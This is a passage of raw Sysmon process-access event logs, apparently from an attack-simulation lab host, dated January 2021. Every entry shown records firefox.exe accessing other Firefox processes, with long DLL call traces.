Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000017271Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.448{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106cd41|C:\Program Files\Mozilla Firefox\xul.dll+172484f|C:\Program Files\Mozilla Firefox\xul.dll+2ba9867|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000017270Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.448{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1216761|C:\Program Files\Mozilla Firefox\xul.dll+2bd81dd|C:\Program Files\Mozilla Firefox\xul.dll+2bd0ec9|C:\Program Files\Mozilla Firefox\xul.dll+2ba9755|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1|C:\Program Files\Mozilla Firefox\firefox.exe+5ae18|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017269Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.448{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000017268Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.448{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000017267Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.448{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000017266Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.448{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000017265Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.448{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000017264Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.448{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000017263Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.448{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000017262Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.448{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000017261Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.448{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000017260Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.448{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000017259Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.448{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000017258Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.448{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000017257Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.448{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000017256Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.448{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2ba9421|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1|C:\Program Files\Mozilla Firefox\firefox.exe+5ae18|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000017255Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.448{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+2ba9393|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program 